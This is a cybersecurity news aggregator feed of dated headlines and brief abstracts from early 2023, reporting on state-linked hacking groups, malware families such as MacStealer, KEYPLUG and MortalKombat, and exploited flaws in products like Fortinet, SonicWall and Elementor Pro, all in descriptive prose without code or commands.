An unknown threat actor used a malicious self-extracting archive (SFX) file in an attempt to establish persistent backdoor access to a victim's environment, new findings from CrowdStrike show. SFX files are capable of extracting the data contained within them without the need for dedicated software to display the file contents. This is achieved by including a decompressor stub, a piece of code that's executed to unpack the archive. "However, SFX archive files can also contain hidden malicious functionality that may not be immediately visible to the file's recipient, and could be missed by technology-based detections alone," CrowdStrike researcher Jai Minton said. In the case investigated by the cybersecurity firm, compromised credentials to a system were used to run a legitimate Windows accessibility application called Utility Manager (utilman.exe) and subsequently launch a password-protected SFX file. This, in turn, is made possible by configuring a de ... (The Hacker News)
April 5, 2023
Hackers can Remotely Open Smart Garage Doors Across the World
Abstract
A security researcher found a series of vulnerabilities with the Nexx brand of smart garage openers. He says he could remotely find garages to target, and then open them across the internet. (Cyware)
April 01, 2023
Hackers Exploiting WordPress Elementor Pro Vulnerability: Millions of Sites at Risk!
Abstract
Unknown threat actors are actively exploiting a recently patched security vulnerability in the Elementor Pro website builder plugin for WordPress. The flaw, described as a case of broken access control, impacts versions 3.11.6 and earlier. It was addressed by the plugin maintainers in version 3.11.7 released on March 22. "Improved code security enforcement in WooCommerce components," Elementor said in its release notes. The premium plugin is estimated to be used on over 12 million sites. Successful exploitation of the high-severity flaw allows an authenticated attacker to complete a takeover of a WordPress site that has WooCommerce enabled. "This makes it possible for a malicious user to turn on the registration page (if disabled) and set the default user role to administrator so they can create an account that instantly has the administrator privileges," Patchstack said in an alert of March 30, 2023. "After this, they are likely to either redi ... (The Hacker News)
March 30, 2023
Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor
Abstract
A Chinese state-sponsored threat activity group tracked as RedGolf has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG. "RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News. "The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon) and has a history of developing and using a large range of custom malware families." The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Mandiant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022. Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG. Bot ... (The Hacker News)
March 29, 2023
Hackers Distribute MacStealer MaaS to Target Mac Users
Abstract
MacStealer is a new information-stealing malware threat attempting to pilfer sensitive information from compromised macOS devices. The malware uses Telegram as its C2 channel and specifically affects devices running Catalina and later versions on M1 and M2 CPUs. It can harvest documents, browser co ... (Cyware)
March 27, 2023
REF2924 Brings a New Weapon NAPLISTENER to the Table
Abstract
The REF2924 threat cluster was observed dropping a previously-unseen malware, dubbed NAPLISTENER, on entities in Southeast and South Asia. The malware evades network-based forms of detection. Actors target Microsoft Exchange Servers exposed to the internet to deploy several backdoors, includin ... (Cyware)
March 24, 2023
China-linked hackers target telecommunication providers in the Middle East
Abstract
Researchers reported that China-linked hackers targeted telecommunication providers in the Middle East in the first quarter of 2023. In the first quarter of 2023, SentinelLabs researchers spotted the initial phases of attacks against telecommunication ... (Security Affairs)
March 24, 2023
Russian Hackers Deploy New AresLoader Malware via Decoy Installers
Abstract
The malicious program appears to be developed and used by several members of a pro-Russia hacktivist group and is typically distributed inside decoy installers for legitimate software. (Cyware)
March 24, 2023
Researchers Uncover Chinese Nation State Hackers’ Deceptive Attack Strategies
Abstract
A recent campaign undertaken by Earth Preta indicates that nation-state groups aligned with China are getting increasingly proficient at bypassing security solutions. The threat actor, active since at least 2012, is tracked by the broader cybersecurity community under Bronze President, HoneyMyte, Mustang Panda, RedDelta, and Red Lich. Attack chains mounted by the group commence with a spear-phishing email to deploy a wide range of tools for backdoor access, command-and-control (C2), and data exfiltration. These messages carry malicious lure archives distributed via Dropbox or Google Drive links that employ DLL side-loading, LNK shortcut files, and fake file extensions as arrival vectors to obtain a foothold and drop backdoors like TONEINS, TONESHELL, PUBLOAD, and MQsTTang (aka QMAGENT). Similar infection chains utilizing Google Drive links have been observed delivering Cobalt Strike as early as April 2021. "Earth Preta tends to hide malicious payloads ... (The Hacker News)
March 23, 2023
German and South Korean Agencies Warn of Kimsuky’s Expanding Cyber Attack Tactics
Abstract
German and South Korean government agencies have warned about cyber attacks mounted by a threat actor tracked as Kimsuky using rogue browser extensions to steal users' Gmail inboxes. The joint advisory comes from Germany's domestic intelligence apparatus, the Federal Office for the Protection of the Constitution (BfV), and South Korea's National Intelligence Service of the Republic of Korea (NIS). The intrusions are designed to strike "experts on the Korean Peninsula and North Korea issues" through spear-phishing campaigns, the agencies noted. Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, refers to a subordinate element within North Korea's Reconnaissance General Bureau and is known to "collect strategic intelligence on geopolitical events and negotiations affecting the DPRK's interests." Primary targets of interest include entities in the U.S. and South Korea, particularly singling out individuals working within ... (The Hacker News)
March 20, 2023
Threat actors abuse Adobe Acrobat Sign to distribute RedLine info-stealer
Abstract
Threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information stealer. Avast researchers reported that threat actors are abusing the legitimate Adobe Acrobat Sign service to distribute the RedLine information ... (Security Affairs)
March 18, 2023
Chinese Hackers Exploit Fortinet Zero-Day Flaw for Cyber Espionage Attack
Abstract
The zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system has been linked to a suspected Chinese hacking group. Threat intelligence firm Mandiant, which made the attribution, said the activity cluster is part of a broader campaign designed to deploy backdoors onto Fortinet and VMware solutions and maintain persistent access to victim environments. The Google-owned threat intelligence and incident response firm is tracking the malicious operation under its uncategorized moniker UNC3886, a China-nexus threat actor. "UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns," Mandiant researchers said in a technical analysis. "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they have ... (The Hacker News)
March 18, 2023
Chinese Hackers Targeting Security and Network Appliances With Custom Backdoors
Abstract
Chinese hackers exploited a critical Fortinet bug and used custom networking malware to steal credentials and maintain network access, according to Mandiant. Victims include defense, telecom, and technology firms, as well as government agencies. (Cyware)
March 16, 2023
Chinese and Russian Hackers Using SILKLOADER Malware to Evade Detection
Abstract
Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines. Dubbed SILKLOADER by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software. The development comes as improved detection capabilities against Cobalt Strike, a legitimate post-exploitation tool used for red team operations, are forcing threat actors to seek alternative options or concoct new ways to propagate the framework to evade detection. "The most common of these include adding complexity to the auto-generated beacon or stager payloads via the utilization of packers, crypters, loaders, or similar techniques," WithSecure researchers said. SILKLOADER joins other loaders such as KoboldLoader, MagnetLoader, and LithiumLoader that have been recently discovered incorporating ... (The Hacker News)
March 16, 2023
Hackers Use AI-Generated YouTube Videos to Spread Info-stealers
Abstract
CloudSEK witnessed a 200-300% month-on-month surge in AI-generated YouTube videos about software cracks containing malicious links to a variety of stealer malware such as Raccoon, RedLine, and Vidar. To make the videos appear at the top of the results, threat actors employ SEO poisoning techniques. ... (Cyware)
March 15, 2023
YoroTrooper Stealing Credentials and Information from Government and Energy Organizations
Abstract
A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in a Tuesday analysis. Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) nations. The threat actor is believed to be Russian-speaking owing to the victimology patterns and the presence of Cyrillic snippets in some of the implants. That said, the YoroTrooper intrusion set has been found to exhibit tactical overlaps with the PoetRAT team that was documented in 2020 as leveraging coronavirus-themed baits to strike government and ene ... (The Hacker News)
March 14, 2023
Pro-Russian Hackers Blackmail Ukrainian Developer of S.T.A.L.K.E.R. 2 Game
Abstract
GSC Game World says it has been enduring cyberattacks for ‘more than a year’ and that hackers demand Russia-friendly changes to the game or else they’ll leak tons of the game’s development materials. (Cyware)
March 13, 2023
China-linked Hackers Abuse SonicWall SMA Devices
Abstract
UNC4540, a China-linked cybercriminal group, was observed deploying a custom backdoor on a SonicWall SMA appliance. Attackers show a thorough understanding of the appliance and use a set of malicious files to obtain privileges. The malware is capable of extracting credentials, achieving persistence ... (Cyware)
March 12, 2023
8220 Gang Uses New ScrubCrypt Crypter to Evade Detection
Abstract
Chinese 8220 Gang deployed the new ScrubCrypt payload exploiting an Oracle Weblogic Server in a specific URI between January and February 2023, revealed security experts at Fortinet. The ScrubCrypt crypter allows a hacker to secure applications with a unique BAT packing technique. It was found to b ... (Cyware)
March 10, 2023
IceFire Operators Introduce Linux Variant, Abuse IBM Flaw
Abstract
Media and entertainment sector organizations worldwide are under attack by the threat actor using the Linux version of the IceFire ransomware. SentinelLabs first made this observation and found that criminals abused a deserialization bug in IBM Aspera Faspex file sharing software, tracked as CVE-20 ... (Cyware)
March 10, 2023
China-linked Hackers Targeting Unpatched SonicWall SMA Devices with Malware
Abstract
A suspected China-linked hacking campaign has been observed targeting unpatched SonicWall Secure Mobile Access (SMA) 100 appliances to drop malware and establish long-term persistence. "The malware has functionality to steal user credentials, provide shell access, and persist through firmware upgrades," cybersecurity company Mandiant said in a technical report published this week. The Google-owned incident response and threat intelligence firm is tracking the activity under its uncategorized moniker UNC4540. The malware – a collection of bash scripts and a single ELF binary identified as a TinyShell backdoor – is engineered to grant the attacker privileged access to SonicWall devices. The overall objective behind the custom toolset appears to be credential theft, with the malware permitting the adversary to siphon cryptographically hashed credentials from all logged-in users. It further provides shell access to the compromised device. Mandiant also called out th ... (The Hacker News)
March 10, 2023
North Korean UNC2970 Hackers Expand Operations with New Malware Families
Abstract
A North Korean espionage group tracked as UNC2970 has been observed employing previously undocumented malware families as part of a spear-phishing campaign targeting U.S. and European media and technology organizations since June 2022. Google-owned Mandiant said the threat cluster shares "multiple overlaps" with a long-running operation dubbed "Dream Job" that employs job recruitment lures in email messages to trigger the infection sequence. UNC2970 is the new moniker designated by the threat intelligence firm to a set of North Korean cyber activity that maps to UNC577 (aka Temp.Hermit), and which also comprises another nascent threat cluster tracked as UNC4034. The UNC4034 activity, as documented by Mandiant in September 2022, entailed the use of WhatsApp to socially engineer targets into downloading a backdoor called AIRDRY.V2 under the pretext of sharing a skills assessment test. "UNC2970 has a concerted effort towards obfuscation and emp ... (The Hacker News)
March 09, 2023
Hackers Exploiting Remote Desktop Software Flaws to Deploy PlugX Malware
Abstract
Security vulnerabilities in remote desktop programs such as Sunlogin and AweSun are being exploited by threat actors to deploy the PlugX malware. AhnLab Security Emergency Response Center (ASEC), in a new analysis, said it marks the continued abuse of the flaws to deliver a variety of payloads on compromised systems. This includes the Sliver post-exploitation framework, XMRig cryptocurrency miner, Gh0st RAT, and Paradise ransomware. PlugX is the latest addition to this list. The modular malware has been extensively put to use by threat actors based in China, with new features continuously added to help perform system control and information theft. In the attacks observed by ASEC, successful exploitation of the flaws is followed by the execution of a PowerShell command that retrieves an executable and a DLL file from a remote server. This executable is a legitimate HTTP Server Service from cybersecurity company ESET, which is used to load the DLL file by means of a techniq ... (The Hacker News)
March 9, 2023
Iran-linked hackers used fake Atlantic Council-affiliated persona to target human rights researchers
Abstract
It’s not clear if this particular persona’s efforts resulted in any successful phishing attacks. The Twitter account, created in October 2022, remains active. An Instagram account associated with the name is unavailable. (Cyware)
March 09, 2023
Iranian Hackers Target Women Involved in Human Rights and Middle East Politics
Abstract
Iranian state-sponsored actors are continuing to engage in social engineering campaigns targeting researchers by impersonating a U.S. think tank. "Notably the targets in this instance were all women who are actively involved in political affairs and human rights in the Middle East region," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The cybersecurity company attributed the activity to a hacking group it tracks as Cobalt Illusion, and which is also known by the names APT35, Charming Kitten, ITG18, Phosphorus, TA453, and Yellow Garuda. The targeting of academics, activists, diplomats, journalists, politicians, and researchers by the threat actor has been well-documented over the years. The group is suspected to be operating on behalf of Iran's Islamic Revolutionary Guard Corps (IRGC) and has exhibited a pattern of using fake personas to establish contact with individuals who are of strategic interest to the governmen ... (The Hacker News)
March 9, 2023
Russian TA499 Targets North American and European Countries
Abstract
Russia-linked TA499 threat actor has been aggressively conducting email campaigns to target high-profile European and North American government authorities and CEOs of reputable organizations. The attack begins with an email or phone call, masquerading as prominent political figures. The phone call ... (Cyware)
March 8, 2023
Sharp Panda Targets Southeast Asian Governments Using Evolved Soul Malware Framework
Abstract
It uses spear-phishing emails for initial access, carrying malicious documents with government-themed lures. It further deploys the RoyalRoad RTF kit, allowing attackers to exploit older vulnerabilities for further infection. (Cyware)
March 07, 2023
Transparent Tribe Hackers Distribute CapraRAT via Trojanized Messaging Apps
Abstract
A suspected Pakistan-aligned advanced persistent threat (APT) group known as Transparent Tribe has been linked to an ongoing cyber espionage campaign targeting Indian and Pakistani Android users with a backdoor called CapraRAT. "Transparent Tribe distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp," ESET said in a report shared with The Hacker News. As many as 150 victims, likely with military or political leanings, are estimated to have been targeted, with the malware (com.meetup.app) available to download from fake websites that masquerade as the official distribution centers of these apps. It's suspected that the targets are lured through a honeytrap romance scam wherein the threat actor approaches the victims via another platform and persuades them to install the malware-laced apps under the pretext of "secure" messaging and calling. However, the apps, besides offering ... (The Hacker News)
March 7, 2023
Transparent Tribe Lures Indian and Pakistani Officials With Romance Scam to Spread Malware
Abstract
ESET researchers have identified an active Transparent Tribe campaign, targeting mostly Indian and Pakistani Android users – presumably with a military or political orientation. (Cyware)
March 03, 2023
Chinese Hackers Targeting European Entities with New MQsTTang Backdoor
Abstract
The China-aligned Mustang Panda actor has been observed using a hitherto unseen custom backdoor called MQsTTang as part of an ongoing social engineering campaign that commenced in January 2023. "Unlike most of the group's malware, MQsTTang doesn't seem to be based on existing families or publicly available projects," ESET researcher Alexandre Côté Cyr said in a new report. Attack chains orchestrated by the group have stepped up targeting of European entities in the wake of Russia's full-scale invasion of Ukraine last year. The victimology of the current activity is unclear, but the Slovak cybersecurity company said the decoy filenames are in line with the group's previous campaigns that target European political organizations. That said, ESET also observed attacks against unknown entities in Bulgaria and Australia, as well as a governmental institution in Taiwan, indicating focus on Europe and Asia. Mustang Panda has a history of using a remote ... (The Hacker News)
March 02, 2023
Hackers Exploit Containerized Environments to Steal Proprietary Data and Software
Abstract
A sophisticated attack campaign dubbed SCARLETEEL is targeting containerized environments to perpetrate theft of proprietary data and software. "The attacker exploited a containerized workload and then leveraged it to perform privilege escalation into an AWS account in order to steal proprietary software and credentials," Sysdig said in a new report. The advanced cloud attack also entailed the deployment of crypto miner software, which the cybersecurity company said is either an attempt to generate illicit profits or a ploy to distract defenders and throw them off the trail. The initial infection vector banked on exploiting a vulnerable public-facing service in a self-managed Kubernetes cluster hosted on Amazon Web Services (AWS). Upon gaining a successful foothold, an XMRig crypto miner was launched and a bash script was used to obtain credentials that could be used to further burrow into the AWS cloud infrastructure and exfiltrate sensitive data. "Either cry ... (The Hacker News)
March 2, 2023
Blackfly: Espionage Group Targets Materials Technology
Abstract
The Blackfly espionage group (aka APT41, Winnti Group, Bronze Atlas) has continued to mount attacks against targets in Asia and recently targeted two subsidiaries of an Asian conglomerate, likely attempting to steal intellectual property. (Cyware)
February 28, 2023
ChromeLoader Operators Hide Malware in VHD Files for Game Cracks
Abstract
Researchers spotted a new ChromeLoader malware campaign that is being propagated via VHD files named after popular games, such as ROBLOX, Elden Ring, Call of Duty, Pokemon, Animal Crossing, and others. ChromeLoader hijacks browser searches to show advertisements and later modifies the browser setting and coll ... (Cyware)
February 28, 2023
Clasiopa Group Uses Distinct Toolset to Target Asian Research Organizations
Abstract
A hacker group, dubbed Clasiopa by the analysts at Broadcom company Symantec, is reportedly launching attacks against organizations in the materials research sector. The group boasts a unique toolset, including the custom Atharvan backdoor. Criminals have also used modified versions of the publicly ... (Cyware)
February 27, 2023
Malicious actors push the limits of attack vectors
Abstract
The war in Ukraine has seen the emergence of new forms of cyberattacks, and hacktivists became savvier and more emboldened to deface sites, leak information, and execute DDoS attacks, according to Trellix. (Cyware)
February 23, 2023
New Hacking Cluster ‘Clasiopa’ Targeting Materials Research Organizations in Asia
Abstract
Materials research organizations in Asia have been targeted by a previously unknown threat actor using a distinct set of tools. Symantec, by Broadcom Software, is tracking the cluster under the moniker Clasiopa. The origins of the hacking group and its affiliations are currently unknown, but there are hints that suggest the adversary could have ties to India. This includes references to "SAPTARISHI-ATHARVAN-101" in a custom backdoor and the use of the password "iloveindea1998^_^" for a ZIP archive. It's worth noting that Saptarishi, meaning "Seven sages" in Sanskrit, refers to a group of seers who are revered in Hindu literature. Atharvan was an ancient Hindu priest and is believed to have co-authored one of the four Vedas, a collection of religious scriptures in Hinduism. "While these details could suggest that the group is based in India, it is also quite likely that the information was planted as false flags, with the password in ... (The Hacker News)
February 22, 2023
Earth Kitsune Returns to Target Selected Entities in China and Japan
Abstract
Trend Micro reported a new threat actor that would drop a new backdoor dubbed WhiskerSpy. The cybercriminal group, tracked as Earth Kitsune, is a relatively new threat group that conducts watering hole attacks. The malware is delivered to users when they attempt to watch videos on attacker-co ... (Cyware)
February 22, 2023
Hydrochasma: New Threat Actor Targets Shipping Companies and Medical Labs in Asia
Abstract
Shipping companies and medical laboratories in Asia have been the subject of a suspected espionage campaign carried out by a never-before-seen threat actor dubbed Hydrochasma. The activity, which has been ongoing since October 2022, "relies exclusively on publicly available and living-off-the-land tools," Symantec, by Broadcom Software, said in a report shared with The Hacker News. There is no evidence available as yet to determine its origin or affiliation with known threat actors, but the cybersecurity company said the group may have an interest in industry verticals that are involved in COVID-19-related treatments or vaccines. The standout aspects of the campaign are the absence of data exfiltration and custom malware, with the threat actor employing open source tools for intelligence gathering. By using already available tools, the goal, it appears, is to not only confuse attribution efforts, but also to make the attacks stealthier. The start of the infection ... (The Hacker News)
February 22, 2023
Threat Actors Adopt Havoc Framework for Post-Exploitation in Targeted Attacks
Abstract
An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike, Sliver, and Brute Ratel. Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc. "While C2 frameworks are prolific, the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation," researchers Niraj Shivtarkar and Niraj Shivtarkar said. The attack sequence documented by Zscaler begins with a ZIP archive that embeds a decoy document and a screen-saver file that's designed to download and launch the Havoc Demon agent on the infected host. Demon is the implant generated v ... (The Hacker News)
February 16, 2023
Hackers Deploy MortalKombat Ransomware and Laplas Clipper Malware Full Text
Abstract
There’s a new financially motivated campaign utilizing MortalKombat ransomware and the Laplas clipper. While the former is a variant of the Xortist commodity ransomware, the latter is a cryptocurrency hijacker that monitors the Windows clipboard for crypto addresses. The campaign’s focus remained o... (Cyware)
February 16, 2023
New Threat Actor WIP26 Targeting Telecom Service Providers in the Middle East Full Text
Abstract
Telecommunication service providers in the Middle East are being targeted by a previously undocumented threat actor as part of a suspected intelligence gathering mission. Cybersecurity firms SentinelOne and QGroup are tracking the activity cluster under the former's work-in-progress moniker WIP26. "WIP26 relies heavily on public cloud infrastructure in an attempt to evade detection by making malicious traffic look legitimate," researchers Aleksandar Milenkoski, Collin Farr, and Joey Chen said in a report shared with The Hacker News. This includes the misuse of Microsoft 365 Mail, Azure, Google Firebase, and Dropbox for malware delivery, data exfiltration, and command-and-control (C2) purposes. The initial intrusion vector used in the attacks entails "precision targeting" of employees via WhatsApp messages that contain Dropbox links to supposedly benign archive files. The files, in reality, harbor a malware loader whose core feature is to depl... (The Hacker News)
February 15, 2023
Financially Motivated Threat Actor Strikes with New Ransomware and Clipper Malware Full Text
Abstract
A new financially motivated campaign that commenced in December 2022 has seen the unidentified threat actor behind it deploying a novel ransomware strain dubbed MortalKombat and a clipper malware known as Laplas. Cisco Talos said it "observed the actor scanning the internet for victim machines with an exposed remote desktop protocol (RDP) port 3389." The attacks, per the cybersecurity company, primarily focus on individuals, small businesses, and large organizations located in the U.S., and to a lesser extent in the U.K., Turkey, and the Philippines. The starting point that kicks off the multi-stage attack chain is a phishing email bearing a malicious ZIP file that's used as a pathway to deliver either the clipper or the ransomware. In addition to using cryptocurrency-themed email lures impersonating CoinPayments, the threat actor is also known to erase infection markers in an attempt to cover its tracks. MortalKombat, first detected in January 2023, is capable... (The Hacker News)
February 13, 2023
New TA866 Threat Group Selectively Targets U.S. and German Organizations Full Text
Abstract
Proofpoint security experts uncovered a threat actor, tracked as TA866, infecting companies in the U.S. and Germany with the new WasabiSeed and Screenshotter malware. The custom malware can perform surveillance and steal data. Hackers push their malware via phishing emails that include Microsoft Pu... (Cyware)
February 13, 2023
Hackers Create Malicious Dota 2 Game Modes to Secretly Access Players’ Systems Full Text
Abstract
An unknown threat actor created malicious game modes for the Dota 2 multiplayer online battle arena (MOBA) video game that could have been exploited to establish backdoor access to players' systems. The modes exploited a high-severity flaw in the V8 JavaScript engine tracked as CVE-2021-38003 (CVSS score: 8.8), which was exploited as a zero-day and addressed by Google in October 2021. "Since V8 was not sandboxed in Dota, the exploit on its own allowed for remote code execution against other Dota players," Avast researcher Jan Vojtěšek said in a report published last week. Following responsible disclosure to Valve, the game publisher shipped fixes on January 12, 2023, by upgrading the version of V8. Game modes are essentially custom capabilities that can either augment an existing title or offer completely new gameplay in a manner that deviates from the standard rules. While publishing a custom game mode to the Steam store includes a vetting process from... (The Hacker News)
February 13, 2023
NewsPenguin Waddles into Pakistani Organizations Full Text
Abstract
A previously unknown threat group, named NewsPenguin, was found targeting organizations in Pakistan with the upcoming Pakistan International Maritime Expo & Conference (PIMEC-2023) as bait. The researchers stated that the goal of the cybercriminal group is solely focused on cyberespionage, with... (Cyware)
February 13, 2023
Hackers Targeting U.S. and German Firms Monitor Victims’ Desktops with Screenshotter Full Text
Abstract
A previously unknown threat actor has been targeting companies in the U.S. and Germany with bespoke malware designed to steal confidential information. Enterprise security company Proofpoint, which is tracking the activity cluster under the name Screentime, said the group, dubbed TA866, is likely financially motivated. "TA866 is an organized actor able to perform well thought-out attacks at scale based on their availability of custom tools; ability and connections to purchase tools and services from other vendors; and increasing activity volumes," the company assessed. Campaigns mounted by the adversary are said to have commenced around October 3, 2022, with the attacks launched via emails containing a booby-trapped attachment or URL that leads to malware. The attachments range from macro-laced Microsoft Publisher files to PDFs with URLs pointing to JavaScript files. The intrusions have also leveraged conversation hijacking to entice recipients into clicking on see... (The Hacker News)
February 11, 2023
Enigma, Vector, and TgToxic: The New Threats to Cryptocurrency Users Full Text
Abstract
Suspected Russian threat actors have been targeting Eastern European users in the crypto industry with fake job opportunities as bait to install information-stealing malware on compromised hosts. The attackers "use several highly obfuscated and under-development custom loaders in order to infect those involved in the cryptocurrency industry with Enigma stealer," Trend Micro researchers Aliakbar Zahravi and Peter Girnus said in a report this week. Enigma is said to be an altered version of Stealerium, an open source C#-based malware that acts as a stealer, clipper, and keylogger. The intricate infection journey starts with a rogue RAR archive file that's distributed via phishing or social media platforms. It contains two documents, one of which is a .TXT file that includes a set of sample interview questions related to cryptocurrency. The second file is a Microsoft Word document that, while serving as a decoy, is tasked with launching the first-stage Enigma loader,... (The Hacker News)
February 11, 2023
Digital Rights Defenders Infiltrate Alleged Mercenary Hacking Group Full Text
Abstract
The EFF has been tracking Dark Caracal since 2015. In 2020, Quintin and EFF’s director of cybersecurity Eva Galperin published a report about a hacking campaign focused on Lebanese targets. (Cyware)
February 11, 2023
MagicWeb Mystery Highlights Nobelium Attacker’s Sophistication Full Text
Abstract
Microsoft has tracked down a sophisticated authentication bypass for Active Directory Federated Services (AD FS), pioneered by the Russia-linked Nobelium threat actor group. (Cyware)
February 10, 2023
North Korean Hackers Targeting Healthcare with Ransomware to Fund its Operations Full Text
Abstract
State-backed hackers from North Korea are conducting ransomware attacks against healthcare and critical infrastructure facilities to fund illicit activities, U.S. and South Korean cybersecurity and intelligence agencies warned in a joint advisory. The attacks, which demand cryptocurrency ransoms in exchange for recovering access to encrypted files, are designed to support North Korea's national-level priorities and objectives. This includes "cyber operations targeting the United States and South Korea governments — specific targets include Department of Defense Information Networks and Defense Industrial Base member networks," the authorities said. Threat actors with North Korea have been linked to espionage, financial theft, and cryptojacking operations for years, including the infamous WannaCry ransomware attacks of 2017 that infected hundreds of thousands of machines located in over 150 countries. Since then, North Korean nation-state crews have dabbled... (The Hacker News)
February 10, 2023
New TA866 group targets companies with custom Screenshotter malware Full Text
Abstract
The TA866 hacking group targets organizations in the United States and Germany with new spyware tracked as Screenshotter. A recently discovered threat actor, tracked as TA866 by security firm Proofpoint, is targeting organizations in the United States... (Security Affairs)
February 09, 2023
NewsPenguin Threat Actor Emerges with Malicious Campaign Targeting Pakistani Entities Full Text
Abstract
A previously unknown threat actor dubbed NewsPenguin has been linked to a phishing campaign targeting Pakistani entities by leveraging the upcoming international maritime expo as a lure. "The attacker sent out targeted phishing emails with a weaponized document attached that purports to be an exhibitor manual for PIMEC-23," the BlackBerry Research and Intelligence Team said. PIMEC, short for Pakistan International Maritime Expo and Conference, is an initiative of the Pakistan Navy and is organized by the Ministry of Maritime Affairs with an aim to "jump start development in the maritime sector." It's scheduled to be held from February 10-12, 2023. The Canadian cybersecurity company said the attacks are designed to target marine-related entities and the event's visitors by tricking the message recipients into opening the seemingly harmless Microsoft Word document. Once the document is launched, a method called remote template injection is employ... (The Hacker News)
February 9, 2023
Scattered Spider Shifts Focus from BPOs and Telcos to IT and Gaming Companies Full Text
Abstract
A CrowdStrike report revealed that the Scattered Spider threat actors are still actively targeting video game and tech companies, after attacking 130 organizations in 2022. There are fake domains impersonating video game makers Roblox and Zynga; IT giants Intuit, Salesforce, Comcast, and Grubhub; a... (Cyware)
February 9, 2023
NewsPenguin, a Previously Unknown Threat Actor, Targets Pakistan with Advanced Espionage Tool Full Text
Abstract
The Canadian cybersecurity company said the attacks are designed to target marine-related entities and the event's visitors by tricking the message recipients into opening the seemingly harmless Microsoft Word document. (Cyware)
February 03, 2023
Iranian OilRig Hackers Using New Backdoor to Exfiltrate Data from Govt. Organizations Full Text
Abstract
The Iranian nation-state hacking group known as OilRig has continued to target government organizations in the Middle East as part of a cyber espionage campaign that leverages a new backdoor to exfiltrate data. "The campaign abuses legitimate but compromised email accounts to send stolen data to external mail accounts controlled by the attackers," Trend Micro researchers Mohamed Fahmy, Sherif Magdy, and Mahmoud Zohdy said. While the technique in itself is not unheard of, the development marks the first time OilRig has adopted it in its playbook, indicating the continued evolution of its methods to bypass security protections. The advanced persistent threat (APT) group, also referred to as APT34, Cobalt Gypsy, Europium, and Helix Kitten, has been documented for its targeted phishing attacks in the Middle East since at least 2014. Linked to Iran's Ministry of Intelligence and Security (MOIS), the group is known to use a diverse toolset in its operations, with re... (The Hacker News)
February 02, 2023
North Korean Hackers Exploit Unpatched Zimbra Devices in ‘No Pineapple’ Campaign Full Text
Abstract
A new intelligence gathering campaign linked to the prolific North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems. That's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident No Pineapple in reference to an error message that's used in one of the backdoors. Targets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain. Roughly 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022. "The threat actor gained access to the network by exploiting a vulnerable Zimbra... (The Hacker News)
February 01, 2023
Hackers Abused Microsoft’s “Verified Publisher” OAuth Apps to Hack Corporate Email Accounts Full Text
Abstract
Microsoft on Tuesday said it took steps to disable fake Microsoft Partner Network (MPN) accounts that were used for creating malicious OAuth applications as part of a malicious campaign designed to breach organizations' cloud environments and steal email. "The applications created by these fraudulent actors were then used in a consent phishing campaign, which tricked users into granting permissions to the fraudulent apps," the tech giant said. "This phishing campaign targeted a subset of customers primarily based in the U.K. and Ireland." Consent phishing is a social engineering attack wherein users are tricked into granting permissions to malicious cloud applications, which can then be weaponized to gain access to legitimate cloud services and sensitive user data. The Windows maker said it became aware of the campaign on December 15, 2022. It has since alerted affected customers via email, with the company noting that the threat actors abused the cons... (The Hacker News)
January 31, 2023
Pro-Palestine hackers threaten Israeli chemical companies Full Text
Abstract
Threat actors are targeting Israeli chemical companies operating in the occupied territories, security experts warn. Threat actors have launched a massive hacking campaign aimed at Israeli chemical companies operating in the occupied territories.... (Security Affairs)
January 30, 2023
UNC2565 threat actors continue to improve the GOOTLOADER malware Full Text
Abstract
The threat actors behind the GOOTLOADER malware continue to improve their code by adding new components and implementing new obfuscation techniques. Mandiant researchers reported that the UNC2565 group behind the GOOTLOADER malware (aka Gootkit)... (Security Affairs)
January 29, 2023
Pro-Russia group Killnet targets Germany due to its support for Ukraine Full Text
Abstract
Pro-Russia group Killnet last week launched DDoS attacks against the websites of German airports, administration bodies, and banks. The Pro-Russia group Killnet is behind the DDoS attacks that last week hit the websites of German airports, administration... (Security Affairs)
January 26, 2023
Researchers Uncover Connection between Moses Staff and Emerging Abraham’s Ax Hacktivist Group Full Text
Abstract
